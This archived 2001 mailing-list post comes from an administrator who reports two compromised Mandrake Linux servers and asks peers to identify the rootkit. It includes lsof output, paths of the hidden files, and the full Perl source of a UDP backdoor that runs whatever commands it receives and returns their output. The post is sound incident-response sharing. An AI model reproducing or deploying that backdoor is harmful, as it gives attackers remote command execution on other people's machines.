Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

New rootkit?

From: UIA Security <securityman () uia net>
Date: Wed, 12 Dec 2001 09:17:19 -0800
Hi folks,
Had 2 comp'd boxes this morning running mandrake linux. Curiously, I can't find info on this rootkit anywhere. Anyone know it? 



lsof -i:

.r00tsnif 11863 root    1u  IPv4 682146       TCP x.com:ssh->a:3510 (CLOSE)
.r00tsnif 11863 root    2u  IPv4 682146       TCP x.com:ssh->a:3510 (CLOSE)
.r00tsnif 11863 root    4u  IPv4 682146       TCP x.com:ssh->a:3510 (CLOSE)
.r00tshoc 11865 root    0u  IPv4 682146       TCP x.com:ssh->a:3510 (CLOSE)
.r00tshoc 11865 root    2u  IPv4 682146       TCP x.com:ssh->a:3510 (CLOSE)
.r00tshoc 11865 root    3u  IPv4 682409       UDP *:4816
.r00tshoc 11865 root    4u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00tpass 11866 root 1u IPv4 682146 TCP x:ssh->209.158.182.186:3510 (CLOSE) 
.r00tpass 11866 root    2u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00tpass 11866 root    3u  IPv4 682407       TCP *:9658 (LISTEN)
.r00tpass 11866 root    4u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00t     11869 root    3u  IPv4 682413       TCP *:65535 (LISTEN)
.r00t     11869 root    4u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00t     11872 root    3u  IPv4 682418       TCP *:31221 (LISTEN)
.r00t     11872 root    4u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00tspin 11874 root    0u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00tspin 11874 root    2u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)
.r00tspin 11874 root    4u  IPv4 682146       TCP x:ssh->a:3510 (CLOSE)



new files:

/usr/lib/.r00t
/usr/lib/.r00t/.r00tshocky
/usr/lib/.r00t/.r00tpasswd
/usr/lib/.r00t/.r00t
/usr/man/man2/.r00tm0e



Some interesting strings:

Welcome to shocker AnD VorTexTK
  You are now r00t.
    Have phun..




/usr/lib/.r00t/.r00tshocky was a perl script to listen for messages on UDP:

#!/usr/bin/perl

$pid=fork;
exit if $pid;
die("Error.") unless defined($pid);

use IO::Socket;
use POSIX;
POSIX::setsid();
$time_to_die=0;

sub signal_handler {
 $time_to_die=1;
}

$SIG{INT}=$SIG{TERM}=$SIG{HUP}=\&signal_handler;

until($time_to_die) {
$|=1;

$port=4816;
$maxlen=1024;

my($sock, $raddr, $rhost);
$sock=IO::Socket::INET->new(LocalPort=>$port,Proto=>'udp') or die("Error.Merge deja\n"); 

while($sock->recv($msg, $maxlen)) {
print $msg;
 my($rport, $ipaddr)=sockaddr_in($sock->peername);
 $rhost=gethostbyaddr($ipaddr, AF_INET);
  $output=`$msg`;
  $sock->send($output);
  $sock->send("-end.");
}
}




...and of course a host of infected binaries.

Any thoughts?

--Liam



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: